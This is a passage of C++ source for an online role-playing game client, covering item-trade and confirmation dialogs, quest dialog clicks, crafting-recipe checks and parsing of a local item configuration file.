		EnableDialogBox(17, cItemID, m_pItemList[cItemID]->m_dwCount, NULL);
		
	}
	else // hum? dj on affiche? , bon je dsactive, ca devrait plutt s'afficher lors du retour du serveur.
	{	
		if (m_stDialogBoxExchangeInfo[0].sV1 == -1)			m_stDialogBoxExchangeInfo[0].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[1].sV1 == -1)	m_stDialogBoxExchangeInfo[1].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[2].sV1 == -1)	m_stDialogBoxExchangeInfo[2].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[3].sV1 == -1)	m_stDialogBoxExchangeInfo[3].sItemID = cItemID;
		//50Cent - MultiTrade
		else if (m_stDialogBoxExchangeInfo[4].sV1 == -1)    m_stDialogBoxExchangeInfo[4].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[5].sV1 == -1)    m_stDialogBoxExchangeInfo[5].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[6].sV1 == -1)    m_stDialogBoxExchangeInfo[6].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[7].sV1 == -1)    m_stDialogBoxExchangeInfo[7].sItemID = cItemID;
		else return; // Impossible case, tested at function beginning
		m_bIsItemDisabled[cItemID] = TRUE;
		bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SETEXCHANGEITEM, NULL, cItemID, 1, NULL, NULL);
		
}
#else
	char cItemID;
	if (m_cCommand < 0) return;
	if (m_stDialogBoxExchangeInfo[3].sV1 != -1) return; //Do not accept item's drop if already 4 items.

	cItemID = (char)m_stMCursor.sSelectedObjectID;
	if ( ((m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_CONSUME) || (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_ARROW)) &&
		 (m_pItemList[cItemID]->m_dwCount > 1) )
	{	m_stDialogBoxInfo[17].sX  = msX - 140;
		m_stDialogBoxInfo[17].sY  = msY - 70;
		if (m_stDialogBoxInfo[17].sY < 0) m_stDialogBoxInfo[17].sY = 0;
		m_stDialogBoxInfo[17].sV1 = m_sPlayerX+1;
		m_stDialogBoxInfo[17].sV2 = m_sPlayerY+1;
		m_stDialogBoxInfo[17].sV3 = 1000;
		m_stDialogBoxInfo[17].sV4 = cItemID;
		if (m_stDialogBoxExchangeInfo[0].sV1 == -1)			m_stDialogBoxExchangeInfo[0].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[1].sV1 == -1)	m_stDialogBoxExchangeInfo[1].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[2].sV1 == -1)	m_stDialogBoxExchangeInfo[2].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[3].sV1 == -1)	m_stDialogBoxExchangeInfo[3].sItemID = cItemID;
		else return; // Impossible case, tested at function beginning
		ZeroMemory(m_stDialogBoxInfo[17].cStr, sizeof(m_stDialogBoxInfo[17].cStr));
		EnableDialogBox(17, cItemID, m_pItemList[cItemID]->m_dwCount, NULL);
		return;
	}else // hum? dj on affiche? , bon je dsactive, ca devrait plutt s'afficher lors du retour du serveur.
	{	
		if (m_stDialogBoxExchangeInfo[0].sV1 == -1)			m_stDialogBoxExchangeInfo[0].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[1].sV1 == -1)	m_stDialogBoxExchangeInfo[1].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[2].sV1 == -1)	m_stDialogBoxExchangeInfo[2].sItemID = cItemID;
		else if (m_stDialogBoxExchangeInfo[3].sV1 == -1)	m_stDialogBoxExchangeInfo[3].sItemID = cItemID;
		else return; // Impossible case, tested at function beginning
		m_bIsItemDisabled[cItemID] = TRUE;
		bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_SETEXCHANGEITEM, NULL, cItemID, 1, NULL, NULL);
		return;
	}
#endif
}
/*********************************************************************************************************************
**  void CGame::DlgBoxClick_Exchange(short msX, short msY)		(snoopy)											**
**  description			:: modifyed for MultiTrade																	**
**********************************************************************************************************************/
void CGame::DlgBoxClick_Exchange(short msX, short msY)
{
#ifdef MULTI_TRADE
	short sX, sY;
	sX = m_stDialogBoxInfo[27].sX;
	sY = m_stDialogBoxInfo[27].sY;
	switch (m_stDialogBoxInfo[27].cMode) {
	case 1: // Not yet confirmed the exchange
		if ((msX >= sX + 220) && (msX <= sX + 220 + DEF_BTNSZX) && (msY >= sY + 310) && (msY <= sY + 310 + DEF_BTNSZY)) // Exchange
		{
			if ((m_stDialogBoxExchangeInfo[0].sV1 != -1) && (m_stDialogBoxExchangeInfo[8].sV1 != -1))//50Cent - MultiTrade
			{    
				PlaySound('E', 14, 5);
				m_stDialogBoxInfo[27].cMode = 2;
				// Show confirmation Diag instead.
				EnableDialogBox(41, NULL, NULL, NULL);
				m_stDialogBoxInfo[41].cMode = 1;
			}
			return;
		}
		if ((msX >= sX + 450) && (msX <= sX + 450 + DEF_BTNSZX) && (msY >= sY + 310) && (msY <= sY + 310 + DEF_BTNSZY)
			&& (m_bIsDialogEnabled[41] == FALSE)) // Cancel only possible if confirmation is not activated
		{
			DisableDialogBox(27);
			DisableDialogBox(22);
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_CANCELEXCHANGEITEM, NULL, NULL, NULL, NULL, NULL);
			PlaySound('E', 14, 5);
			return;
		}
		break;

	case 2: // Someone already confirmed the exchange
	
		break;
}
#else
	short sX, sY;
	sX = m_stDialogBoxInfo[27].sX ;
	sY = m_stDialogBoxInfo[27].sY ;
	switch (m_stDialogBoxInfo[27].cMode) {
	case 1: // Not yet confirmed the exchange
		if ((msX >= sX + 220) && (msX <= sX + 220 + DEF_BTNSZX) && (msY >= sY + 310) && (msY <= sY + 310 + DEF_BTNSZY)) // Exchange
		{	if ( (m_stDialogBoxExchangeInfo[0].sV1 != -1) && (m_stDialogBoxExchangeInfo[4].sV1 != -1))
			{	
				PlaySound('E', 14, 5);
				m_stDialogBoxInfo[27].cMode = 2;
				// Show confirmation Diag instead.
				EnableDialogBox(41, NULL, NULL, NULL);
				m_stDialogBoxInfo[41].cMode = 1;
			}
			return;
		}
		if (   (msX >= sX + 450) && (msX <= sX + 450 + DEF_BTNSZX) && (msY >= sY + 310) && (msY <= sY + 310 + DEF_BTNSZY)
			&& (m_bIsDialogEnabled[41] == FALSE)) // Cancel only possible if confirmation is not activated
		{	DisableDialogBox(27);
			DisableDialogBox(22);
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_CANCELEXCHANGEITEM, NULL, NULL, NULL, NULL, NULL);
			PlaySound('E', 14, 5);
			return;
		}
		break;

	case 2: // Someone already confirmed the exchange
	
		break;
	}
#endif
}
/*********************************************************************************************************************
**  void CGame::DlgBoxClick_ConfirmExchange(short msX, short msY)		(snoopy)									**
**  description			:: click on confirmation diag																**
**********************************************************************************************************************/
void CGame::DlgBoxClick_ConfirmExchange(short msX, short msY)
{
#ifdef MULTI_TRADE
	short sX, sY;
	sX = m_stDialogBoxInfo[41].sX;
	sY = m_stDialogBoxInfo[41].sY;

	switch (m_stDialogBoxInfo[41].cMode) {
	case 1: // Not yet confirmed the exchange
		// yes
		if ((msX >= sX + 30) && (msX <= sX + 30 + DEF_BTNSZX) && (msY >= sY + 55) && (msY <= sY + 55 + DEF_BTNSZY))
		{
			if ((m_stDialogBoxExchangeInfo[0].sV1 != -1) && (m_stDialogBoxExchangeInfo[8].sV1 != -1))//50Cent - MultiTrade
			{
				bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_CONFIRMEXCHANGEITEM, NULL
					, m_stDialogBoxExchangeInfo[0].sV1 // ItemID; inutilis par serveur
					, m_stDialogBoxExchangeInfo[0].sV3 // Amount; inutilis par serveur
					, NULL, NULL);
				PlaySound('E', 14, 5);
				m_stDialogBoxInfo[27].cMode = 2;
				m_stDialogBoxInfo[41].cMode = 2;
			}
			return;
		}
		// No
		if ((msX >= sX + 170) && (msX <= sX + 170 + DEF_BTNSZX) && (msY >= sY + 55) && (msY <= sY + 55 + DEF_BTNSZY))
		{
			DisableDialogBox(41);
			DisableDialogBox(27);
			DisableDialogBox(22);
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_CANCELEXCHANGEITEM, NULL, NULL, NULL, NULL, NULL);
			PlaySound('E', 14, 5);
			return;
		}
		break;
	case 2: // waiting for other side to confirm
		break;
	}
#else
	short sX, sY;
	sX = m_stDialogBoxInfo[41].sX ;
	sY = m_stDialogBoxInfo[41].sY ;

	switch (m_stDialogBoxInfo[41].cMode) {
	case 1: // Not yet confirmed the exchange
		// yes
		if ((msX >= sX + 30) && (msX <= sX + 30 + DEF_BTNSZX) && (msY >= sY + 55) && (msY <= sY + 55 + DEF_BTNSZY))
		{	if ( (m_stDialogBoxExchangeInfo[0].sV1 != -1) && (m_stDialogBoxExchangeInfo[4].sV1 != -1))
			{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_CONFIRMEXCHANGEITEM, NULL
					, m_stDialogBoxExchangeInfo[0].sV1 // inutilis par serveur
					, m_stDialogBoxExchangeInfo[0].sV3 // inutilis par serveur
					, NULL, NULL);
				PlaySound('E', 14, 5);
				m_stDialogBoxInfo[27].cMode = 2;
				m_stDialogBoxInfo[41].cMode = 2;
			}
			return;
		}
		// No
		if ((msX >= sX + 170 ) && (msX <= sX + 170 + DEF_BTNSZX ) && (msY >= sY + 55 ) && (msY <= sY + 55 + DEF_BTNSZY))
		{	DisableDialogBox(41);
			DisableDialogBox(27);
			DisableDialogBox(22);
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_CANCELEXCHANGEITEM, NULL, NULL, NULL, NULL, NULL);
			PlaySound('E', 14, 5);
			return;
		}
		break;
	case 2: // waiting for other side to confirm
		break;
	}
#endif
}

void CGame::DlgBoxClick_Quest(int msX, int msY)
{
 short sX, sY;

	sX = m_stDialogBoxInfo[28].sX;
	sY = m_stDialogBoxInfo[28].sY;

	if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY)) {
		DisableDialogBox(28);
		PlaySound('E', 14, 5);
	}

	//50Cent - Quest Helper
	if ((msX > sX + 92) && (msX < sX + 165) && (msY > sY + 232) && (msY < sY + 245))
    {    
        if(m_bIsDialogEnabled[55] == FALSE){
            EnableDialogBox(55, NULL, NULL, NULL);
        }
        else{
            DisableDialogBox(55);
        }
        PlaySound('E', 14, 5);
    }
}

int CGame::_iGetBankItemCount()
{
 int i, iCnt;

	iCnt = 0;
	for (i = 0; i < DEF_MAXBANKITEMS; i++)
		if (m_pBankList[i] != NULL) iCnt++;

	return iCnt;
}

BOOL CGame::_bDecodeBuildItemContents()
{char cFileName[255], cTemp[255];
 HANDLE hFile;
 FILE * pFile;
 DWORD  dwFileSize;
 char * pBuffer;
 BOOL   bRet;
 int    i;

	for (i = 0; i < DEF_MAXBUILDITEMS; i++)
	if (m_pBuildItemList[i] != NULL)
	{	delete m_pBuildItemList[i];
		m_pBuildItemList[i] = NULL;
	}

	ZeroMemory(cTemp, sizeof(cTemp));
	ZeroMemory(cFileName, sizeof(cFileName));

	strcpy(cTemp, "BItemcfg");
	strcat(cFileName, "contents");
	strcat(cFileName, "\\");
	strcat(cFileName, "\\");
	strcat(cFileName, cTemp);
	strcat(cFileName, ".txt");

	hFile = CreateFile(cFileName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	dwFileSize = GetFileSize(hFile, NULL);
	if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);

	pFile = fopen(cFileName, "rt");
	if (pFile == NULL) return FALSE;
	else
	{	pBuffer = new char[dwFileSize+1];
		ZeroMemory(pBuffer, dwFileSize+1);
		fread(pBuffer, dwFileSize, 1, pFile);
		bRet = __bDecodeBuildItemContents(pBuffer);
		delete[] pBuffer;
	}
	fclose(pFile);
	return bRet;
}

BOOL CGame::_bCheckBuildItemStatus()
{int iIndex, i, j, iMatch, iCount;
 char cTempName[21];
 int  iItemCount[DEF_MAXITEMS];

	for (i = 0; i < DEF_MAXBUILDITEMS; i++)
	if (m_pDispBuildItemList[i] != NULL)
	{	delete m_pDispBuildItemList[i];
		m_pDispBuildItemList[i] = NULL;
	}
	iIndex = 0;
	for (i = 0; i < DEF_MAXBUILDITEMS; i++)
	if (m_pBuildItemList[i] != NULL)
	{	// Skill-Limit
		if (m_cSkillMastery[13] >= m_pBuildItemList[i]->m_iSkillLimit)
		{	iMatch = 0;
			m_pDispBuildItemList[iIndex] = new class CBuildItem;
			memcpy(m_pDispBuildItemList[iIndex]->m_cName, m_pBuildItemList[i]->m_cName, 20);

			memcpy(m_pDispBuildItemList[iIndex]->m_cElementName1, m_pBuildItemList[i]->m_cElementName1, 20);
			memcpy(m_pDispBuildItemList[iIndex]->m_cElementName2, m_pBuildItemList[i]->m_cElementName2, 20);
			memcpy(m_pDispBuildItemList[iIndex]->m_cElementName3, m_pBuildItemList[i]->m_cElementName3, 20);
			memcpy(m_pDispBuildItemList[iIndex]->m_cElementName4, m_pBuildItemList[i]->m_cElementName4, 20);
			memcpy(m_pDispBuildItemList[iIndex]->m_cElementName5, m_pBuildItemList[i]->m_cElementName5, 20);
			memcpy(m_pDispBuildItemList[iIndex]->m_cElementName6, m_pBuildItemList[i]->m_cElementName6, 20);

			m_pDispBuildItemList[iIndex]->m_iElementCount[1] = m_pBuildItemList[i]->m_iElementCount[1];
			m_pDispBuildItemList[iIndex]->m_iElementCount[2] = m_pBuildItemList[i]->m_iElementCount[2];
			m_pDispBuildItemList[iIndex]->m_iElementCount[3] = m_pBuildItemList[i]->m_iElementCount[3];
			m_pDispBuildItemList[iIndex]->m_iElementCount[4] = m_pBuildItemList[i]->m_iElementCount[4];
			m_pDispBuildItemList[iIndex]->m_iElementCount[5] = m_pBuildItemList[i]->m_iElementCount[5];
			m_pDispBuildItemList[iIndex]->m_iElementCount[6] = m_pBuildItemList[i]->m_iElementCount[6];

			m_pDispBuildItemList[iIndex]->m_iSprH       = m_pBuildItemList[i]->m_iSprH;
			m_pDispBuildItemList[iIndex]->m_iSprFrame   = m_pBuildItemList[i]->m_iSprFrame;
			m_pDispBuildItemList[iIndex]->m_iMaxSkill   = m_pBuildItemList[i]->m_iMaxSkill;
			m_pDispBuildItemList[iIndex]->m_iSkillLimit = m_pBuildItemList[i]->m_iSkillLimit;

			// ItemCount
			for (j = 0; j < DEF_MAXITEMS; j++)
			if (m_pItemList[j] != NULL)
				 iItemCount[j] = m_pItemList[j]->m_dwCount;
			else iItemCount[j] = 0;

			// Element1
			ZeroMemory(cTempName, sizeof(cTempName));
			memcpy(cTempName, m_pBuildItemList[i]->m_cElementName1, 20);
			iCount = m_pBuildItemList[i]->m_iElementCount[1];
			if (iCount == 0) iMatch++;
			else
			{	for (j = 0; j < DEF_MAXITEMS; j++)
				if (m_pItemList[j] != NULL) {
					if ((memcmp(m_pItemList[j]->m_cName, cTempName, 20) == 0) && (m_pItemList[j]->m_dwCount >= (DWORD)(iCount)) &&
						(iItemCount[j] > 0))
					{	iMatch++;
						m_pDispBuildItemList[iIndex]->m_bElementFlag[1] = TRUE;
						iItemCount[j] -= iCount;
						goto CBIS_STEP2;
			}	}	}

CBIS_STEP2:;
			// Element2
			ZeroMemory(cTempName, sizeof(cTempName));
			memcpy(cTempName, m_pBuildItemList[i]->m_cElementName2, 20);
			iCount = m_pBuildItemList[i]->m_iElementCount[2];
			if (iCount == 0) iMatch++;
			else
			{	for (j = 0; j < DEF_MAXITEMS; j++)
				if (m_pItemList[j] != NULL)
				{	if ((memcmp(m_pItemList[j]->m_cName, cTempName, 20) == 0) && (m_pItemList[j]->m_dwCount >= (DWORD)(iCount)) &&
						(iItemCount[j] > 0))
					{	iMatch++;
						m_pDispBuildItemList[iIndex]->m_bElementFlag[2] = TRUE;
						iItemCount[j] -= iCount;
						goto CBIS_STEP3;
			}	}	}

CBIS_STEP3:;
			// Element3
			ZeroMemory(cTempName, sizeof(cTempName));
			memcpy(cTempName, m_pBuildItemList[i]->m_cElementName3, 20);
			iCount = m_pBuildItemList[i]->m_iElementCount[3];
			if (iCount == 0) iMatch++;
			else
			{	for (j = 0; j < DEF_MAXITEMS; j++)
				if (m_pItemList[j] != NULL)
				{	if ((memcmp(m_pItemList[j]->m_cName, cTempName, 20) == 0) && (m_pItemList[j]->m_dwCount >= (DWORD)(iCount)) &&
						(iItemCount[j] > 0))
					{	iMatch++;
						m_pDispBuildItemList[iIndex]->m_bElementFlag[3] = TRUE;
						iItemCount[j] -= iCount;
						goto CBIS_STEP4;
			}	}	}

CBIS_STEP4:;
		    // Element4 ˻
			ZeroMemory(cTempName, sizeof(cTempName));
			memcpy(cTempName, m_pBuildItemList[i]->m_cElementName4, 20);
			iCount = m_pBuildItemList[i]->m_iElementCount[4];
			if (iCount == 0) iMatch++;
			else
			{	for (j = 0; j < DEF_MAXITEMS; j++)
				if (m_pItemList[j] != NULL)
				{	if ((memcmp(m_pItemList[j]->m_cName, cTempName, 20) == 0) && (m_pItemList[j]->m_dwCount >= (DWORD)(iCount)) &&
						(iItemCount[j] > 0))
					{	iMatch++;
						m_pDispBuildItemList[iIndex]->m_bElementFlag[4] = TRUE;
						iItemCount[j] -= iCount;
						goto CBIS_STEP5;
			}	}	}

CBIS_STEP5:;

			// Element5
			ZeroMemory(cTempName, sizeof(cTempName));
			memcpy(cTempName, m_pBuildItemList[i]->m_cElementName5, 20);
			iCount = m_pBuildItemList[i]->m_iElementCount[5];
			if (iCount == 0) iMatch++;
			else
			{	for (j = 0; j < DEF_MAXITEMS; j++)
				if (m_pItemList[j] != NULL)
				{	if ((memcmp(m_pItemList[j]->m_cName, cTempName, 20) == 0) && (m_pItemList[j]->m_dwCount >= (DWORD)(iCount)) &&
						(iItemCount[j] > 0))
					{	iMatch++;
						m_pDispBuildItemList[iIndex]->m_bElementFlag[5] = TRUE;
						iItemCount[j] -= iCount;
						goto CBIS_STEP6;
			}	}	}

CBIS_STEP6:;

			// Element6
			ZeroMemory(cTempName, sizeof(cTempName));
			memcpy(cTempName, m_pBuildItemList[i]->m_cElementName6, 20);
			iCount = m_pBuildItemList[i]->m_iElementCount[6];
			if (iCount == 0) iMatch++;
			else
			{	for (j = 0; j < DEF_MAXITEMS; j++)
				if (m_pItemList[j] != NULL)
				{	if ((memcmp(m_pItemList[j]->m_cName, cTempName, 20) == 0) && (m_pItemList[j]->m_dwCount >= (DWORD)(iCount)) &&
						(iItemCount[j] > 0))
					{	iMatch++;
						m_pDispBuildItemList[iIndex]->m_bElementFlag[6] = TRUE;
						iItemCount[j] -= iCount;
						goto CBIS_STEP7;
			}	}	}

CBIS_STEP7:;

			if (iMatch == 6) m_pDispBuildItemList[iIndex]->m_bBuildEnabled = TRUE;
			iIndex++;
	}	}
	return TRUE;
}

BOOL CGame::_ItemDropHistory(char * ItemName)
{BOOL bFlag = FALSE;
	if (m_iItemDropCnt == 0 )
	{	strcpy(m_cItemDrop[m_iItemDropCnt], ItemName);
		m_iItemDropCnt++;
		return TRUE;
	}
	if ( (1 <= m_iItemDropCnt) && (20 >= m_iItemDropCnt) )
	{	for (int i = 0; i < m_iItemDropCnt; i++)
		{	if (strcmp(m_cItemDrop[i], ItemName) == 0)
			{	bFlag = TRUE;
	            break;
		}	}
		if (bFlag)
		{	if (m_bItemDrop)
				return FALSE;
			else
				return TRUE;
		}

		if( 20 < m_iItemDropCnt )
		{	for (int i = 0; i < m_iItemDropCnt ; i++)
            strcpy(m_cItemDrop[i-1], ItemName);
			strcpy(m_cItemDrop[20], ItemName);
			m_iItemDropCnt = 21;
		}else
		{	strcpy(m_cItemDrop[m_iItemDropCnt], ItemName);
			m_iItemDropCnt++;
	}	}
	return TRUE;
}


BOOL CGame::__bDecodeBuildItemContents(char *pBuffer)
{char * pContents, * token;
 char seps[] = "= ,\t\n";
 char cReadModeA = 0;
 char cReadModeB = 0;
 int  iIndex = 0;
 class CStrTok * pStrTok;
	pContents = pBuffer;
	pStrTok = new class CStrTok(pContents, seps);
	token = pStrTok->pGet();

	while( token != NULL )
	{	if (cReadModeA != 0)
		{	switch (cReadModeA) {
			case 1:
				switch (cReadModeB) {
				case 1:
					ZeroMemory(m_pBuildItemList[iIndex]->m_cName, sizeof(m_pBuildItemList[iIndex]->m_cName));
					memcpy(m_pBuildItemList[iIndex]->m_cName, token, strlen(token));
					cReadModeB = 2;
					break;
				case 2:
					m_pBuildItemList[iIndex]->m_iSkillLimit = atoi(token);
					cReadModeB = 3;
					break;
				case 3: // m_cElementName1
					ZeroMemory(m_pBuildItemList[iIndex]->m_cElementName1, sizeof(m_pBuildItemList[iIndex]->m_cElementName1));
					memcpy(m_pBuildItemList[iIndex]->m_cElementName1, token, strlen(token));
					cReadModeB = 4;
					break;
				case 4: // m_iElementCount1
					m_pBuildItemList[iIndex]->m_iElementCount[1] = atoi(token);
					cReadModeB = 5;
					break;
				case 5: // m_cElementName2
					ZeroMemory(m_pBuildItemList[iIndex]->m_cElementName2, sizeof(m_pBuildItemList[iIndex]->m_cElementName2));
					memcpy(m_pBuildItemList[iIndex]->m_cElementName2, token, strlen(token));
					cReadModeB = 6;
					break;
				case 6: // m_iElementCount2
					m_pBuildItemList[iIndex]->m_iElementCount[2] = atoi(token);
					cReadModeB = 7;
					break;
				case 7: // m_cElementName3
					ZeroMemory(m_pBuildItemList[iIndex]->m_cElementName3, sizeof(m_pBuildItemList[iIndex]->m_cElementName3));
					memcpy(m_pBuildItemList[iIndex]->m_cElementName3, token, strlen(token));
					cReadModeB = 8;
					break;
				case 8: // m_iElementCount3
					m_pBuildItemList[iIndex]->m_iElementCount[3] = atoi(token);
					cReadModeB = 9;
					break;
				case 9: // m_cElementName4
					ZeroMemory(m_pBuildItemList[iIndex]->m_cElementName4, sizeof(m_pBuildItemList[iIndex]->m_cElementName4));
					memcpy(m_pBuildItemList[iIndex]->m_cElementName4, token, strlen(token));
					cReadModeB = 10;
					break;
				case 10: // m_iElementCount4
					m_pBuildItemList[iIndex]->m_iElementCount[4] = atoi(token);
					cReadModeB = 11;
					break;
				case 11: // m_cElementName5
					ZeroMemory(m_pBuildItemList[iIndex]->m_cElementName5, sizeof(m_pBuildItemList[iIndex]->m_cElementName5));
					memcpy(m_pBuildItemList[iIndex]->m_cElementName5, token, strlen(token));
					cReadModeB = 12;
					break;
				case 12: // m_iElementCount5
					m_pBuildItemList[iIndex]->m_iElementCount[5] = atoi(token);
					cReadModeB = 13;
					break;
				case 13: // m_cElementName6
					ZeroMemory(m_pBuildItemList[iIndex]->m_cElementName6, sizeof(m_pBuildItemList[iIndex]->m_cElementName6));
					memcpy(m_pBuildItemList[iIndex]->m_cElementName6, token, strlen(token));
					cReadModeB = 14;
					break;
				case 14: // m_iElementCount6
					m_pBuildItemList[iIndex]->m_iElementCount[6] = atoi(token);
					cReadModeB = 15;
					break;

				case 15:
					m_pBuildItemList[iIndex]->m_iSprH = atoi(token);
					cReadModeB = 16;
					break;

				case 16:
					m_pBuildItemList[iIndex]->m_iSprFrame = atoi(token);
					cReadModeB = 17;
					break;

				case 17:
					m_pBuildItemList[iIndex]->m_iMaxSkill = atoi(token);

					cReadModeA = 0;
					cReadModeB = 0;
					iIndex++;
					break;
				}
				break;

			default:
				break;
			}
		}else
		{	if (memcmp(token, "BuildItem", 9) == 0)
			{	cReadModeA = 1;
				cReadModeB = 1;
				m_pBuildItemList[iIndex] = new class CBuildItem;
		}	}
		token = pStrTok->pGet();
	}
	delete pStrTok;
	if ((cReadModeA != 0) || (cReadModeB != 0)) return FALSE;
	return TRUE;
}


BOOL CGame::_bCheckCurrentBuildItemStatus()
{
 int i, iCount2, iMatch, iIndex, iItemIndex[7];
 int iCount;
 int iItemCount[7];
 char cTempName[21];
 BOOL bItemFlag[7];

	iIndex = m_stDialogBoxInfo[26].cStr[0];

	if (m_pBuildItemList[iIndex] == NULL) return FALSE;

	iItemIndex[1] = m_stDialogBoxInfo[26].sV1;
	iItemIndex[2] = m_stDialogBoxInfo[26].sV2;
	iItemIndex[3] = m_stDialogBoxInfo[26].sV3;
	iItemIndex[4] = m_stDialogBoxInfo[26].sV4;
	iItemIndex[5] = m_stDialogBoxInfo[26].sV5;
	iItemIndex[6] = m_stDialogBoxInfo[26].sV6;

	for (i = 1; i <= 6; i++)
	if (iItemIndex[i] != -1)
		 iItemCount[i] = m_pItemList[iItemIndex[i]]->m_dwCount;
	else iItemCount[i] = 0;
	iMatch = 0;
	for (i = 1; i <= 6; i++) bItemFlag[i] = FALSE;

	// Element1
	ZeroMemory(cTempName, sizeof(cTempName));
	memcpy(cTempName, m_pDispBuildItemList[iIndex]->m_cElementName1, 20);
	iCount = m_pDispBuildItemList[iIndex]->m_iElementCount[1];
	if (iCount == 0) iMatch++;
	else
	{	for (i = 1; i <= 6; i++)
		{	if ((iItemIndex[i] != -1) && (memcmp(m_pItemList[iItemIndex[i]]->m_cName, cTempName, 20) == 0) &&
				(m_pItemList[iItemIndex[i]]->m_dwCount >= (DWORD)(iCount)) &&
				(iItemCount[i] > 0) && (bItemFlag[i] == FALSE))
			{	iMatch++;
				iItemCount[i] -= iCount;
				bItemFlag[i] = TRUE;
				goto CCBIS_STEP2;
	}	}	}

CCBIS_STEP2:;

	// Element2
	ZeroMemory(cTempName, sizeof(cTempName));
	memcpy(cTempName, m_pDispBuildItemList[iIndex]->m_cElementName2, 20);
	iCount = m_pDispBuildItemList[iIndex]->m_iElementCount[2];
	if (iCount == 0) iMatch++;
	else
	{	for (i = 1; i <= 6; i++)
		{	if ((iItemIndex[i] != -1) && (memcmp(m_pItemList[iItemIndex[i]]->m_cName, cTempName, 20) == 0) &&
				(m_pItemList[iItemIndex[i]]->m_dwCount >= (DWORD)(iCount)) &&
				(iItemCount[i] > 0) && (bItemFlag[i] == FALSE))
			{	iMatch++;
				iItemCount[i] -= iCount;
				bItemFlag[i] = TRUE;
				goto CCBIS_STEP3;
	}	}	}

CCBIS_STEP3:;


	// Element3
	ZeroMemory(cTempName, sizeof(cTempName));
	memcpy(cTempName, m_pDispBuildItemList[iIndex]->m_cElementName3, 20);
	iCount = m_pDispBuildItemList[iIndex]->m_iElementCount[3];
	if (iCount == 0) iMatch++;
	else
	{	for (i = 1; i <= 6; i++)
		{	if ((iItemIndex[i] != -1) && (memcmp(m_pItemList[iItemIndex[i]]->m_cName, cTempName, 20) == 0) &&
				(m_pItemList[iItemIndex[i]]->m_dwCount >= (DWORD)(iCount)) &&
				(iItemCount[i] > 0) && (bItemFlag[i] == FALSE))
			{	iMatch++;
				iItemCount[i] -= iCount;
				bItemFlag[i] = TRUE;
				goto CCBIS_STEP4;
	}	}	}

CCBIS_STEP4:;

	// Element4
	ZeroMemory(cTempName, sizeof(cTempName));
	memcpy(cTempName, m_pDispBuildItemList[iIndex]->m_cElementName4, 20);
	iCount = m_pDispBuildItemList[iIndex]->m_iElementCount[4];
	if (iCount == 0) iMatch++;
	else
	{	for (i = 1; i <= 6; i++)
		{	if ((iItemIndex[i] != -1) && (memcmp(m_pItemList[iItemIndex[i]]->m_cName, cTempName, 20) == 0) &&
				(m_pItemList[iItemIndex[i]]->m_dwCount >= (DWORD)(iCount)) &&
				(iItemCount[i] > 0) && (bItemFlag[i] == FALSE))
			{	iMatch++;
				iItemCount[i] -= iCount;
				bItemFlag[i] = TRUE;
				goto CCBIS_STEP5;
	}	}	}

CCBIS_STEP5:;

	// Element5
	ZeroMemory(cTempName, sizeof(cTempName));
	memcpy(cTempName, m_pDispBuildItemList[iIndex]->m_cElementName5, 20);
	iCount = m_pDispBuildItemList[iIndex]->m_iElementCount[5];
	if (iCount == 0) iMatch++;
	else
	{	for (i = 1; i <= 6; i++)
		{	if ((iItemIndex[i] != -1) && (memcmp(m_pItemList[iItemIndex[i]]->m_cName, cTempName, 20) == 0) &&
				(m_pItemList[iItemIndex[i]]->m_dwCount >= (DWORD)(iCount)) &&
				(iItemCount[i] > 0) && (bItemFlag[i] == FALSE))
			{	iMatch++;
				iItemCount[i] -= iCount;
				bItemFlag[i] = TRUE;
				goto CCBIS_STEP6;
	}	}	}

CCBIS_STEP6:;

	// Element6
	ZeroMemory(cTempName, sizeof(cTempName));
	memcpy(cTempName, m_pDispBuildItemList[iIndex]->m_cElementName6, 20);
	iCount = m_pDispBuildItemList[iIndex]->m_iElementCount[6];
	if (iCount == 0) iMatch++;
	else
	{	for (i = 1; i <= 6; i++)
		{	if ((iItemIndex[i] != -1) && (memcmp(m_pItemList[iItemIndex[i]]->m_cName, cTempName, 20) == 0) &&
				(m_pItemList[iItemIndex[i]]->m_dwCount >= (DWORD)(iCount)) &&
				(iItemCount[i] > 0) && (bItemFlag[i] == FALSE))
			{	iMatch++;
				iItemCount[i] -= iCount;
				bItemFlag[i] = TRUE;
				goto CCBIS_STEP7;
	}	}	}

CCBIS_STEP7:;

	iCount = 0;
	for (i = 1; i <= 6; i++)
	if (m_pDispBuildItemList[iIndex]->m_iElementCount[i] != 0) iCount++;
	iCount2 = 0;
	for (i = 1; i <= 6; i++)
	if (iItemIndex[i] != -1) iCount2++;
	if ((iMatch == 6) && (iCount == iCount2)) return TRUE;
	return FALSE;
}

void CGame::NoticementHandler(char * pData)
{
 char * cp;
 FILE * pFile;
 WORD * wp;
	wp = (WORD *)(pData + DEF_INDEX2_MSGTYPE);
	switch (*wp) {
	case DEF_MSGTYPE_CONFIRM:
		break;
	case DEF_MSGTYPE_REJECT:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		pFile = fopen("contents\\contents1000.txt", "wt");
